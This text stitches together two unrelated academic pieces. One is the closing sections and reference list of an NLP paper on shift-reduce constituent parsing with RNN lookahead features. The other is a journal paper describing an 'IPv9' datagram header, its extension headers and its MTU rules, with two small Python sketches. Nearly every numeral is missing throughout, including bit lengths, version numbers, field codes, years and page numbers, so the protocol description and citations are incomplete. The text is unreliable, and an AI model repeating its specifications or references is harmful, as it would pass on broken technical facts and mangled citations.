in par- ticular, our parser is more closely related to neu- ral models that integrate discrete manual features (socher et al., ; durrett and klein, ). socher et al. ( ) use neural features to rerank a sparse baseline parser; durrett and klein directly in- tegrate sparse features into neural layers in a chart parser. in contrast, we integrate neural information into sparse features in the form of lookahead fea- tures. there has also been work on lookahead features for parsing. tsuruoka et al. ( ) run a baseline parser for a few future steps, and use the output ac- tions to guide the current action. in contrast to their model, our model leverages full sentential informa- tion, yet is significantly faster. previous work investigated more efficient parsing without loss of accuracy, which is required by real time applications, such as web parsing. zhang et al. ( b) introduced a chart pruner to accelerate a ccg parser. kummerfeld et al. ( ) proposed a self-training method focusing on increasing the speed of a ccg parser rather than its accuracy. conclusion we proposed a novel constituent hierarchy predic- tor based on recurrent neural networks, aiming to capture global sentential information. the resulting constituent hierarchies are fed to a baseline shift- reduce parser as lookahead features, addressing lim- itations of shift-reduce parsers in not leveraging right-hand side syntax for local decisions, yet main- taining the same model size and speed. the resulting fully-supervised parser outperforms the state-of-the- art baseline parser by achieving . % f on stan- dard wsj evaluation and . % f on standard ctb evaluation. acknowledgments we thank the anonymous reviewers for their detailed and constructive comments, and the co-editor-in- chief lillian lee for her extremely detailed copy editing. this work is supported by t moe of singapore ministry of education. yue zhang is the corresponding author. references dzmitry bahdanau, kyunghyun cho, and yoshua ben- gio. . neural machine translation by jointly learning to align and translate. iclr. miguel ballesteros, chris dyer, and noah a. smith. . improved transition-based parsing by modeling characters instead of words with lstms. in emnlp, pages – . srinivas bangalore and aravind k. joshi. . su- pertagging: an approach to almost parsing. compu- tational linguistics, ( ): – , june. daniel m. bikel. . on the parameter space of gener- ative lexicalized statistical parsing models. phd the- sis, university of pennsylvania. xavier carreras, michael collins, and terry koo. . tag, dynamic programming, and the perceptron for efficient, feature-rich parsing. in conll, pages – , morristown, nj, usa. association for computational linguistics. eugene charniak and mark johnson. . coarse-to- fine n-best parsing and maxent discriminative rerank- ing. in acl. eugene charniak. . a maximum-entropy-inspired parser. in anlp, pages – . danqi chen and christopher manning. . a fast and accurate dependency parser using neural networks. in emnlp, pages – , stroudsburg, pa, usa. as- sociation for computational linguistics. kyunghyun cho, bart van merrienboer, çaglar gülçehre, dzmitry bahdanau, fethi bougares, holger schwenk, and yoshua bengio. . learning phrase represen- tations using rnn encoder-decoder for statistical ma- chine translation. in emnlp, pages – . stephen clark and james r. curran. . the impor- tance of supertagging for wide-coverage ccg pars- ing. in coling, pages – , morristown, nj, usa, august. 
university of edinburgh, association for computational linguistics. stephen clark. . supertagging for combinatory cat- egorial grammar. in proceedings of the sixth inter- national workshop on tree adjoining grammar and related frameworks, pages – , universita di venezia. michael collins and brian roark. . incremental parsing with the perceptron algorithm. in acl, mor- ristown, nj, usa. association for computational lin- guistics. michael collins. . head-driven statistical models for natural language parsing. computational linguis- tics, ( ): – . james cross and liang huang. . span-based con- stituency parsing with a structure-label system and provably optimal dynamic oracles. in emnlp. rebecca dridan, valia kordoni, and jeremy nicholson. . enhancing performance of lexicalised gram- mars. in acl. greg durrett and dan klein. . neural crf parsing. in acl, pages – . chris dyer, miguel ballesteros, wang ling, austin matthews, and noah a. smith. . transition- based dependency parsing with stack long short-term memory. in acl-ijcnlp, pages – . chris dyer, adhiguna kuncoro, miguel ballesteros, and noah a. smith. . recurrent neural network grammars. in naacl, pages – . agnieszka faleńska, anders björkelund, özlem çetinoğlu, and wolfgang seeker. . stacking or supertagging for dependency parsing – what’s the difference? in proceedings of the th international conference on parsing technologies. joshua goodman. . parsing inside-out. phd thesis, harvard university. alex graves and jürgen schmidhuber. . offline handwriting recognition with multidimensional recur- rent neural networks. in nips, pages – . alex graves, navdeep jaitly, and abdel-rahman mo- hamed. . hybrid speech recognition with deep bidirectional lstm. in ieee workshop on automatic speech recognition & understanding (asru), pages – . ieee. sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation, ( ): – , november. zhongqiang huang and mary p. harper. . self- training pcfg grammars with latent annotations across languages. in emnlp, pages – . zhongqiang huang, mary p. harper, and slav petrov. . self-training with products of latent variable grammars. in emnlp, pages – . liang huang. . forest reranking: discriminative parsing with non-local features. in acl, pages – . yoon kim, yacine jernite, david sontag, and alexan- der m. rush. . character-aware neural language models. in aaai. jonathan k. kummerfeld, jessika roesner, tim daw- born, james haggerty, james r. curran, and stephen clark. . faster parsing by supertagger adap- tation. in acl, pages – . university of cam- bridge, association for computational linguistics, july. minh-thang luong, quoc v. le, ilya sutskever, oriol vinyals, and lukasz kaiser. . multi-task se- quence to sequence learning. iclr. mitchell p. marcus, beatrice santorini, and mary ann marcinkiewicz. . building a large annotated cor- pus of english: the penn treebank. computational linguistics, ( ): – . david mcclosky, eugene charniak, and mark johnson. . effective self-training for parsing. in hlt- naacl, pages – , morristown, nj, usa. as- sociation for computational linguistics. takashi ninomiya, takuya matsuzaki, yoshimasa tsu- ruoka, yusuke miyao, and jun’ichi tsujii. . ex- tremely lexicalized models for accurate and fast hpsg parsing. in emnlp, pages – . university of manchester, association for computational linguis- tics, july. slav petrov and dan klein. . improved inference for unlexicalized parsing. in hlt-naacl, pages – . adwait ratnaparkhi. . 
a linear observed time sta- tistical parser based on maximum entropy models. in emnlp. brian roark and kristy hollingshead. . linear complexity context-free parsing pipelines via chart constraints. in hlt-naacl, pages – . kenji sagae and alon lavie. . a classifier-based parser with linear runtime complexity. in iwpt, pages – , morristown, nj, usa. association for com- putational linguistics. kenji sagae and alon lavie. . parser combination by reparsing. in hlt-naacl, pages – , mor- ristown, nj, usa. association for computational lin- guistics. cicero d. santos and bianca zadrozny. . learning character-level representations for part-of-speech tag- ging. in icml, pages – . yves schabes. . stochastic tree-adjoining gram- mars. in proceedings of the workshop on speech and natural language, pages – . association for computational linguistics. mike schuster and kuldip k. paliwal. . bidirec- tional recurrent neural networks. signal processing, ieee transaction, ( ): – . hiroyuki shindo, yusuke miyao, akinori fujino, and masaaki nagata. . bayesian symbol-refined tree substitution grammars for syntactic parsing. in acl, pages – . richard socher, john bauer, christopher d. manning, and andrew y. ng. . parsing with compositional vector grammars. in acl, pages – . ilya sutskever, james martens, george e. dahl, and ge- offrey e. hinton. . on the importance of ini- tialization and momentum in deep learning. in icml, pages – . ilya sutskever, oriol vinyals, and quoc v. le. . sequence to sequence learning with neural networks. in nips, pages – . yoshimasa tsuruoka, yusuke miyao, and jun’ichi kazama. . learning with lookahead: can history-based models rival globally optimized models? in conll, pages – . ashish vaswani, yonatan bisk, and kenji sagae. . supertagging with lstms. in naacl. k. vijay-shanker and aravind k. joshi. . a study of tree adjoining grammars. citeseer. oriol vinyals, lukasz kaiser, terry koo, slav petrov, ilya sutskever, and geoffrey e. hinton. . gram- mar as a foreign language. in nips, pages – . zhiguo wang and nianwen xue. . joint pos tag- ging and transition-based constituent parsing in chi- nese with non-local features. in acl, pages – , stroudsburg, pa, usa. association for computational linguistics. zhiguo wang, haitao mi, and nianwen xue. . feature optimization for constituent parsing via neu- ral networks. in acl-ijcnlp, pages – , stroudsburg, pa, usa. association for computational linguistics. taro watanabe and eiichiro sumita. . transition- based neural constituent parsing. in acl, pages – . wenduan xu, michael auli, and stephen clark. . ccg supertagging with a recurrent neural network. in acl-ijcnlp, pages – , stroudsburg, pa, usa. association for computational linguistics. naiwen xue, fei xia, fu-dong chiou, and martha palmer. . the penn chinese treebank: phrase structure annotation of a large corpus. natural lan- guage engineering, ( ): – . yue zhang and stephen clark. . transition-based parsing of the chinese treebank using a global discrim- inative model. in icpt, pages – , morristown, nj, usa. association for computational linguistics. yue zhang and stephen clark. . syntactic process- ing using the generalized perceptron and beam search. computational linguistics, ( ): – . yaozhong zhang, takuya matsuzaki, and jun’ichi tsu- jii. a. a simple approach for hpsg supertag- ging using dependency information. in naacl-hlt, pages – . university of manchester, association for computational linguistics, june. yue zhang, byung-gyu ahn, stephen clark, curt van wyk, james r. 
curran, and laura rimell. b. chart pruning for fast lexicalised-grammar parsing. in coling, pages – . hao zhou, yue zhang, shujian huang, and jiajun chen. . a neural probabilistic structured-prediction model for transition-based dependency parsing. in acl, pages – . muhua zhu, yue zhang, wenliang chen, min zhang, and jingbo zhu. . fast and accurate shift-reduce con- stituent parsing. in acl, pages – . 引言 international journal of advanced network, monitoring and controls volume , no. , research and design of next generation internet (ipv ) datagram wang zhongsheng . state and provincial joint engineering lab. of advanced network, monitoring and control, china . school of computer science and engineering xi'an technological university xi'an, china e-mail: wzhsh @ .com xie jianping . chinese decimal network working group shanghai, china . shanghai decimal system network information technology ltd. e-mail: @ .cn lin zhao . chinese decimal network working group shanghai, china . shanghai decimal system network information technology ltd. e-mail: chinalinzhao@ .com zhong wei . chinese decimal network working group shanghai, china . shanghai decimal system network information technology ltd. e-mail: @ .cn abstract—the current global internet uses the tcp/ip protocol cluster. ip is the network layer protocol and the core protocol in this protocol family. the current version is ipv with -bit addresses. with the popularity of internet applications, the limited address space defined by ipv has been exhausted. to expand the address space, the internet engineering task force (ietf) has designed the next generation ip protocol, ipv , to replace ipv . ipv redefines the address space, using a -bit address length that provides almost unlimited addresses. however, with the development and application of the internet of things, big data and cloud storage, ipv has some shortcomings in its address structure design, security and network sovereignty, so it is urgent to develop a new generation or future internet with security and reliability, autonomy and controllable , and it becomes a research hotspot in the world. this paper developed a new generation internet (ipv ) datagram by researching the existed ipv and ipv , and it is based on the method of assigning addresses to computers connected to the internet by full decimal character code which designed by the chinese decimal network working group with the leader of xie jianping. it is a subsequent version with rfc , rfc , a new generation of network data structure, it is not the updating of ipv [rfc - ] and ipv [rfc - ], [rfc - ], it is a new vision to demonstration and testing. keywords-future network; ipv ; ipv ; ipv ; datagram a datagram is the basic unit of data transmitted on the network. it contains a header and the data itself, in which the header describes the destination of the data and its relationship to other data. datagram is a complete and independent data entity, which carries the information to be transferred from the source computer to the destination computer and does not rely on the previous exchange between the source and the destination and the transmission network [ ]. tcp/ip protocol defines a packet that is transmitted on the internet; called ip datagram, which are the network layer protocol and the core protocol of the tcp/ip protocol family. doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , ip is a virtual package consisting of a header and data. 
the ipv header is a fixed length of bytes, which is required for all ip datagram. after the fixed portion of the header are optional fields whose length is variable. both the source and destination addresses in the header are ip protocol addresses. the current global internet uses the tcp/ip protocol cluster, the current version is ipv with -bit addresses. with the popularity of internet applications, the limited address space defined by ipv has been exhausted. to expand the address space, the internet engineering task force (ietf) has designed the next generation ip protocol, ipv , to replace ipv . ipv redefines the address space, using a -bit address length that provides almost unlimited addresses. however, with the development and application of the internet of things, big data and cloud storage, ipv has some shortcomings in its address structure design, security and network sovereignty. the chinese researchers developed a new generation internet (ipv ) datagram by researching the existed ipv and ipv , and it is based on the method of assigning addresses to computers connected to the internet by full decimal character code. it is a subsequent version with rfc , rfc , a new generation of network data structure, it is not the updating of ipv and ipv , it is a new vision to demonstration and testing. i. overall design objective in order to be compatible with the existing internet system, on the basis of studying the existing standard ipv [rfc - ] and ipv [rfc - ] and [rfc - ], the overall goal of ipv datagram design is formulated. ) extended address capacity ipv increases the length of ip addresses from (ipv ) and (ipv ) bits to bits to support more address hierarchies, more addressable nodes, and simpler automatic address configurations. it also increases the ipv bit address length reduced to bits, in order to solve mobile communication. ) variable length and uncertain number digits in order to reduce the network overhead, this datagram designing adopts the method of indefinite length and uncertain number of digits. by adding a "range" field to the multicast address, the scalability of multicast routing is improved. it defines a new address type, "any broadcast address," for sending datagrams to any one of a set of nodes. ) simplify and improve header format some ipv header fields have been eliminated or made optional to reduce the overhead of common processing on packet control and to limit ipv header bandwidth overhead. the encoding of header options has been changed to allow more efficient forwarding, reduce restrictions on the length of options, and gain more flexibility to introduce new options in the future. ) label data streams to attach labels to data streams belonging to a particular data communication, the sender may require special processing of these data streams, such as non- default quality of service or real-time service, such as using virtual circuits to achieve the purpose of circuit communication. ) high safety and reliability to get security and reliability, the new datagram added expansionary support for ip address encryption and authentication, data integrity, and data security (optional) in ipv designing. it extension headers and options take into account the length of packets, the semantics of flow control labels and categories, and the impact on high-level protocols. ) direct routing addressing the icmp (internet control message protocol) version of ipv contains all the requirements for implementing ipv . 
the function of route character arrangement authentication, recognition and addressing is added, which reduces the routing cost and improves the efficiency. international journal of advanced network, monitoring and controls volume , no. , ) compatible with ipv and ipv in order to ensure a smooth transition from ipv to ipv , considering the protection of the original investment and not changing user habits, this datagram defines ipv header and transitional header. the last segment address is used for the header of ipv or ipv is used, but the version number is changed to , the connection protocols used are ipv or ipv . ) the virtual and real circuit design in order to smoothly transmit voice, image and video and other big data real-time applications, it is necessary to adopt long-stream code, absolute value, return code and other technologies, and adopt three- layer and four-layer network hybrid architecture. three-layer and four-layer network hybrid architecture design should be implemented in virtual and real circuits. ii. general design of system a. some basic terminologies the basic concepts in system designing are defined as follows. ) node: a device installed with ipv or ipv device compatible with ipv and ipv . ) router: the device that is responsible for forwarding and explicitly not sending ipv data to itself. ) host: any node that does not belong to the router. ) upper agreement: protocols located in the layer above ipv . for example, transport layer protocols tcp, udp, a communication facility or medium in the link layer, on which nodes can carry out link-layer communication, that is, the layer just below ipv . examples of links include ethernet (or bridged), ppp links, x. , frame relay, or atm networks. ) neighbor: each node connected to the same link. ) interface: node to link connection. ) address: ipv layer identifier of an interface or a group of interfaces. ) packet: an ipv header plus load. ) link mut (maximum transmission unit): the maximum transmission unit that can be transmitted on a section of link, namely the maximum data packet length in eight-bit group. ) path mut: the smallest mut of all links in the path between the source node and the destination node. note: for a device with multiple interfaces, it can be configured to forward non-self-directed packets from one of its interfaces and drop from other interfaces. when such a device receives data from a previous interface or interacts with a neighbor, the protocol requirements of the host must be followed. b. ipv header format the format design of ipv datagram header is shown in table . table i. ipv header format version number category type flow label address length priority class communication authentication address absolute communication payload length next header hop limit source address ( - bit) destination address ( - bit) time authorization code international journal of advanced network, monitoring and controls volume , no. , the design of table is explained below. ) version number: the length is bits, representing the internet protocol version number. for ipv , this field must be . ) category type: the length is bits, the high bits are used to specify the address length, its volume is to , and it’s to the power. contains address length of byte ~ byte; the default value is bits, where is bits, is bits, is bits, is bits, is bits, is bits, is bits, and is bits. the last five bits specify the communication class and authentication for the source and destination addresses. 
to is used to specify the priority class of the communication, to is used to specify the communication method after the first authentication, which is used by the packet sending place for control and whether the source address and destination address authentication is needed. to are used to specify absolute communication that will not fall back when congestion is encountered, and are used for virtual circuits. and are used to assign audio and video, called absolute value, to ensure the uninterrupted transmission of audio and video. the other values are reserved for future use. ) flow label: with a length of bits, it is used to identify packages belonging to the same business flow. ) payload length (net load length): the length is bits, including the net load byte length, that is, the number of bytes contained in the packet after ipv header. ) next header: the length is bits. this field indicates the protocol type in the field following the ipv header. ) hop limit: the length is bits, and this field is subtracted one each time a node forwards a packet. ) source address: the length is bit ~ bit, and the sender address of ipv packet is specified. adopt the method of variable length and uncertain number digits. ) destination address: the length is bit ~ bit, and the destination address of ipv packet is specified. adopt the method of variable length and uncertain number digits. ) time: it is used to control the lifetime of the address in the header. ) authorization code: it is used to identify the authenticity of the address in the header. c. extended headers of ipv in ipv datagrams, internet optional information is placed in specialized headers which between the packet ipv header and the high-level protocol header. the number of such extended headers is not too much, and each identified by a different value for the next header. an ipv packet can have zero to more than one extension header, each of which is defined in the next header s field in the previous header, as shown in table . table ii. extended header format ipv header label next header =tcp tcp header +data ipv header label next header = route routing header next header =tcp tcp header +data ipv header label next header = route routing header next header = data segment data segment header next header =tcp tcp data segment header +data international journal of advanced network, monitoring and controls volume , no. , on the path of the packet passing, no node to checks or processes the extended header until the packet reaches the node specified by the destination address field in the ipv header (or, if it is a multicast address, it would be a group of nodes). for the normal multiplexing of the next header field of ipv header, the processing module is called to process the first extended header. if an extended header does not exist, the high level header is processed. therefore, the extension headers must be processed exactly in the order in which they appear in the packet, and the receiver cannot scan the packet to find a particular extension header and process it before processing other preceding headers. if a node, after processing the header wants to process the next header, but it does not recognize the value of the "next header" , it will lost the packet, and sends the source a "icmp parameter problem" message, the message icmp code has a value of (can't identify the "next header" type), "icmp indicator" contained in the field could not identify the "next header values" offset location in the original packets. 
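before going through the processing rules for extension headers, the sketch below shows one way the fixed header fields and the next-header chain described above could be modelled. it is a simplified illustration only: the numeric codes, field widths and example values used here (the routing and tcp next-header numbers, the hop limit, the 9 in the version field, the 32-byte addresses) are placeholders chosen for the example, not values taken from the specification.

```python
from dataclasses import dataclass, field
from typing import List

# placeholder next-header codes, for illustration only
NH_ROUTING = 43
NH_TCP = 6

@dataclass
class ExtensionHeader:
    next_header: int            # code of whatever follows this extension header
    body: bytes = b""

@dataclass
class IPV9Header:
    version: int                # version field (9 used below as a placeholder)
    category_type: int          # high bits: address-length code, low five bits: class
    flow_label: int
    payload_length: int
    next_header: int            # identifies the first extension header or upper protocol
    hop_limit: int
    source_address: bytes       # variable-length address
    destination_address: bytes  # variable-length address
    time: int                   # lifetime control for the addresses in the header
    authorization_code: int     # authenticity check for the addresses in the header
    extensions: List[ExtensionHeader] = field(default_factory=list)

def header_chain(pkt: IPV9Header) -> List[int]:
    """follow the next-header chain through the extension headers."""
    return [pkt.next_header] + [ext.next_header for ext in pkt.extensions]

# toy usage: base header -> routing header -> tcp payload
pkt = IPV9Header(version=9, category_type=0, flow_label=1, payload_length=0,
                 next_header=NH_ROUTING, hop_limit=64,
                 source_address=bytes(32), destination_address=bytes(32),
                 time=0, authorization_code=0,
                 extensions=[ExtensionHeader(next_header=NH_TCP)])
print(header_chain(pkt))        # [43, 6]
```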
the same is done if a node finds the "next header" field is in any non- ipv header. each extended header is an integer multiple of the -bit array so that subsequent headers can be aligned along -bit array boundaries. in the extended header, the fields made up of multiple -bit groups are internally aligned with their internal natural boundaries, that is, the position in the fields of width n -bit groups are placed at the beginning of the header, an integer times n -bit groups, where n= , , or . the fully installed ipv includes the following extension headers:  hop-by-hop option(segment options)  routing(type )  fragment;  destination options;  authentication;  encapsulating security payload. this paper defines the first four extension headers, and the next two additional definitions. ) the sequence of extension headers when multiple extension headers are used in the same packet, they appear in the following order: a ipv header; b segment options header; c destination options header(annotation ); d routing header; e data segment header; f authentication header; g encapsulate security load header; h destination option header(annotation ); i the upper header; annotation : options for the first destination node to appear in the ipv destination address field and for subsequent destination nodes listed in the routing header. annotation : the option to be processed only by the destination node of the packet. each extended header can occur at most once, but destination option headers can occur at most twice, once before routing headers and once before high-level headers. if the high-level header is another ipv header (that is, when ipv is encapsulated in another ipv tunnel), it can be followed by its own extended headers, which, as a whole, follow the same sequence. when defining other extended headers, it must specify a sequential relationship between them and the headers listed above ) options when the extension header is defined the segment- by-segment option and the destination option header have an unequal number of options encoded in the form of type length value (tlv). the format is shown in table . international journal of advanced network, monitoring and controls volume , no. , table iii. option format option type option data length option data where, option type: -bit identifier. option data length: -bit unsigned integer. it is the length of the data field for this option, in -bit groups. option data: variable length field, the data is related to the option type. the order of the options in the header must be handled in strict accordance with the order in which they appear in the header. the receiver cannot scan the header for a particular type of option and cannot process it before processing all previous options. the option type identifier is internally defined, and its highest two bits specify what must be done if the node handling ipv cannot identify the option type. : skip this option and continue with the header. : abandon the packet. : abandon the packet and send a "icmp parameter problem, code ," message to the source address, regardless of whether the destination address is a multicast address, indicating that the option type is not recognized. : abandon the packet. only when the destination address of the packet is not a multicast address, send a message of "icmp parameter problem, code " to the source address, indicating the type of option it cannot recognize. 
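the handling of an unrecognized option type can be sketched as a small dispatcher on the two highest bits of the type octet. the concrete bit values are not legible in the text above, so this sketch assumes the four listed behaviours map onto the bit patterns 00, 01, 10 and 11 in the order given.

```python
from enum import Enum

class UnrecognizedOptionAction(Enum):
    SKIP = 0                        # skip the option, keep processing the header
    DISCARD = 1                     # silently discard the packet
    DISCARD_SEND_ICMP = 2           # discard, always send ICMP parameter problem
    DISCARD_SEND_ICMP_UNICAST = 3   # discard, send ICMP only if dest is not multicast

def handle_unrecognized_option(option_type: int, dest_is_multicast: bool) -> str:
    """decide what to do with an option whose type is not recognized,
    based on the two highest bits of the option type (assumed mapping)."""
    action = UnrecognizedOptionAction((option_type >> 6) & 0b11)
    if action is UnrecognizedOptionAction.SKIP:
        return "continue"
    if action is UnrecognizedOptionAction.DISCARD:
        return "drop"
    if action is UnrecognizedOptionAction.DISCARD_SEND_ICMP:
        return "drop+icmp"
    return "drop+icmp" if not dest_is_multicast else "drop"

print(handle_unrecognized_option(0b10_000001, dest_is_multicast=False))  # drop+icmp
```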
the high third bit of the option type specifies whether the data for this option can change on the way to the destination of the packet. : option data cannot be changed during transport. : option data can be changed during transport. when the authentication header appears in the packet, when calculating the authentication value of the packet, the whole field in which any data can change in the way is treated as an -bit group of all zeros. each option can have its own alignment requirements to ensure that the values of multiple -bit groups in the option data field fall to the natural boundaries. the alignment of the choices is required in terms of xn+y, the option type must be an integer multiple of x -bit groups plus y -bit groups from the beginning of the header. such as: n means the offset is any multiple of two -bit groups from the beginning of the header. n+ means the offset is any multiple of eight -bit groups from the beginning of the header plus two -bit groups. ) pad option a) pad option(alignment requirement: none) notice: the format of the pad option is a special case where there is no length field or value field. the pad option is used to insert an -bit group of fill bits in the header option field. b) padn option if need to fill out multiple -bit groups, it should be used the padn option instead of multiple pad options. the padn option format (alignment requirement: none) is shown in table . table iv. padn option format option data length option data the padn option inserts two or more -bit groups of fill bits into the header option field. to fill in n -bit groups, the value of the option data length field should be n- , and the option data field contains n- all- - bit groups. ) segment options header international journal of advanced network, monitoring and controls volume , no. , segment options header is used to carry the option information that must be checked and processed by all nodes on the path the packet travels through. in ipv , the header of each network segment option is represented by the value of the next header is , as shown in table . table v. segment options header format next header the extension length of the header options next header:it's an -bit selector. it is used to identify the header type just following the each segment header option. it is the same value as the ipv protocol field [rfc- ]. the extension length of the header: it is an -bit unsigned integer. the length of the header of each segment option, in -bit groups, does not include the first -bit group. option: variable length field whose length makes the length of each segment header an -bit integer multiple. it contains one or more tlv encoding options. in addition to the pad and padn options specified above, the large load options (alignment requirement: n+ ) are defined, as shown in table . table vi. large load option format option data length heavy load length the large load option is used to send ipv packets with a load length of more than , -bit groups, the large load length is the length of the packet, in -bit groups, excluding ipv headers but including segment option headers, it has to be greater than , . if a packet with a large load option is received and the large load length is less than or equal to , a message of "icmp parameter problem, code " is sent to the source node, pointing to the high bit of the invalid large load length field. if the packet has a large load option, the load length in the ipv header must be set to . 
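the tlv option encoding and the padn rule described above (a data length field of n-2 followed by n-2 zero octets) can be sketched as follows. the pad and padn option type codes are not given legibly here, so 0 and 1 are used as placeholder type values, and the 8-octet alignment target is likewise only an example.

```python
PAD1_TYPE = 0   # placeholder type code for the one-octet pad option
PADN_TYPE = 1   # placeholder type code for the padn option

def encode_tlv(opt_type: int, data: bytes) -> bytes:
    """encode one option as type / data length / data (length counts data only)."""
    return bytes([opt_type, len(data)]) + data

def padn(n: int) -> bytes:
    """padn option filling n octets (n >= 2): the data length field is n-2,
    followed by n-2 all-zero octets."""
    if n < 2:
        raise ValueError("padn fills at least two octets; use the pad option for one")
    return bytes([PADN_TYPE, n - 2]) + bytes(n - 2)

def pad_option_block(options: bytes, multiple: int = 8) -> bytes:
    """pad an encoded option block up to a multiple of `multiple` octets."""
    gap = -len(options) % multiple
    if gap == 0:
        return options
    return options + (bytes([PAD1_TYPE]) if gap == 1 else padn(gap))

opts = encode_tlv(0xC2, bytes(4))          # a 6-octet option (type chosen arbitrarily)
print(len(pad_option_block(opts)))         # 8
```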
if received a packet that contains both a payload length option and an ipv payload length field that is not , it need to send a message to the source node with "icmp parameter has a problem, code " and pointing to the large payload option type field. the large load option cannot be used in packets with segment headers. if the data segment header is encountered in the packet containing the high-load option, a message "icmp parameter problem, code " will be sent to the source node, pointing to the first - bit group of the data segment header. if the installed ipv does not support the large load option, it does not have an interface to a link with mtu greater than (ipv header with -bit groups, plus g -bit group loads). ) routing header ipv uses the routing header to list one or more intermediate nodes that needs to be accessed on the path of the packet to the destination node. this function is very similar to the source routing options of ipv . the routing header is identified by the next header field whose previous header median value is ; the format is shown in table . table vii. routing header format next header length of the extension header routing type remaining data segment data related to type next header: it's an -bit selector. it use the same value as the ipv protocol field [rfc- ]. length of the extension header: it is an -bit unsigned integer. the routing header length is in -bit groups, does not contain the first -bit group. international journal of advanced network, monitoring and controls volume , no. , routing type : the route header variable's -bit identifier remaining data segment: it is an -bit unsigned integer. the number of remaining routing data segments, that is, the number of intermediate nodes explicitly listed, which are the nodes to be accessed before reaching the final destination node. data related to type: it is a variable length field, whose format is determined by the route type, its length makes the entire route header an integer, multiple of the -bit group. if a node encounters an unrecognized routing type value while processing the received packet, the action that the node will take depends on the value of the remaining data segment field. it includes the following two cases: a) if the value of the remaining data segment field is , the node must ignore the routing header and continue to process the next header of the packet. the header type is given in the header field next to the routing header. b) if the value of the remaining data segment field is not , the node must abandon the packet and send a message of "icmp parameter exists problem, code " to the source address of the packet, pointing to the unrecognized routing type the format of the route header for type is shown in table . table viii. type routing header format next header length of extension header routing type = remaining data segment reserve strict/loose bit innuendo address [ ] address [ ] …… address [n] next header: it is an -bit selector. its identity follows the routing header type. it uses the same value as the ipv protocol field [rfc- ]. length of extension header: it is an -bit unsigned integer. the routing header length is in -bit groups that does not contain the first -bit group. for routing headers of type , the header extension length is equal to twice the number of addresses in the header and is an even number less than or equal to . routing type is . remaining data segment: it is an -bit unsigned integer. 
the number of remaining routing data segments, that is, the number of intermediate nodes explicitly listed, which are the nodes to be accessed before reaching the final destination node. the maximum effective value is . reserve: it is an -bit reserved field. the sender initializes it to , and the receiver ignores the field. strict/loose bit innuendo: to from left to right. for each routing data segment, indicate whether the next destination address must be the neighbor of the previous node: indicates strict (must be neighbor), indicates loose (need not be neighbor). address [ …..n]: it’s a -bit address vector, value from to n. multicast addresses cannot appear in routing header packets of type or in routing header packets of type in the destination address field of ipv . if the value of the zero bit of the strict/loose bit innuendo is , the destination address field in the ipv header of the original packet must indicate a neighbor of the source node. if the zero bit is , the sender can international journal of advanced network, monitoring and controls volume , no. , use any legal, non-multicast address as the initial destination address. ) data segment header ipv source hosts use segment headers to send mtu packets that are longer than the packet delivery path. different from ipv , in ipv , only the source host completes the segmentation, rather than the router on the path of the packet. the data segment header is identified by setting the next header to in its previous header, as shown in table . table ix. data segment header format next header reserve data segment offset reserve m identifier next header: it is an bit selector. the initial header type (defined below) that identifies the data segment portion of the original packet. use the same values as the ipv protocol fields [rfc- ]. reserve: it is an -bit field. it is initialized to zero at the sender and ignored at the receiver. data segment offset: it is an -bit field. the number of bytes moved forward or backward from the specified position. m: flag indicates that there are more data segments, and indicates the last data segment. identifier: it has -bit field. in order to send mtu packets whose length is longer than the transmission path, the source node can split the packet into several data segments and send each data segment as a separate data packet, and then reassemble the data packet at the receiver. for each packet to be segmented, the source node generates an identifier value for it. any piece of data in any recently delivered packet with the same source and destination addresses must have a different identifier. if a routing header is present, the destination address being considered is the final destination address. ) destination options header the destination option header is used to carry the option that only needs to be checked by the packet's final node. the destination option header is identified by the header before it, with the next header field value of ; the format is shown in table . table x. header format of destination address options next header length of extension header option next header: bit selector. this is an identifier type of header that follows the destination option header. use the same value as the ipv [rfc- ]. length of extension header: it is an -bit unsigned integer. the destination option header length is in -bit groups, and does not contain the first -bit group. option: it’s a variable length field, whose length makes the destination option header length an integer multiple of -bit group. 
it contains one or more tlv encoding options. optional destination information in ipv packets is encoded in two ways: defined in the destination options header, or as a separate extended header. data segment headers and authentication headers are two examples of the latter. which one to take is depends on the action if the destination node could not recognize the option information. international journal of advanced network, monitoring and controls volume , no. , a) if the destination node operation is want to abandon packets, and only in the destination node address of the packet is not the multicast address, then send the packet source address a "icmp unrecognized type” message, and then these messages can be encapsulated into a separate header, or destination option in a header option, and the highest two digits of the option type are . this choice depends on a number of factors, such as fewer bytes, better alignment, or easy to parse. b) if both operations are required, the messages must be encoded as an option at the head of the destination option, whose option type has a highest two digits is , , or , specifying which actions will be take. note: when the next header field of an ipv header or any extended header is , which means there's nothing behind the header. if the ipv header payload length field indicates that there are -bit groups after the next header field of , these -bit groups must be ignored, and the content is passed as is when the packet must be forwarded. iii. packet length design ipv requires a minimum of mtu per link on the internet. on any link, if it cannot pass -bit groups in one packet, then the data segment and reassembly associated with the link must be supported by the hierarchy below ipv . for each link directly connected to the node, the node must be able to accept packets as large as mtu. links with configurable mtu (such as ppp links [rfc- ]) must be configured with at least -bit groups, and larger mtu is recommended to accommodate possible encapsulations (such as tunnels) without fragmentation. ipv nodes are recommended to implement path mtu discovery [rfcc- ] in order to discover and take advantage of mtu links larger than . however, a minimal ipv implementation (such as in a bootrom) can simply restrict itself from sending packets larger than and omit the path mtu discovery implementation. in order to send mtu packets with a length greater than the link, the node can segment the packet at the source node and assemble it at the destination node by using the data segment header of ipv . however, this fragmentation is not recommended in any application unless it can resize packets to fit the mtu of the link being measured. a node must be guaranteed to accept segmented packets that exceed bytes after reassembly, including ipv headers. however, a node must ensure that it does not send segmented packets larger than bytes after reassembly unless it is explicitly told that the destination node can assemble such a large packet. when sending an ipv packet to an ipv node (that is packets go through the transition from ipv to ipv )), the ipv source node may receive an "icmp packet too big" (icmp packet is too big) message reporting that next-hop mtu must be less than . in this case, ipv does not need to reduce the size of subsequent packets to less than , but must include a segment header in those packets so that the ipv -ipv conversion router can obtain an appropriate identifier value for the constructed ipv . 
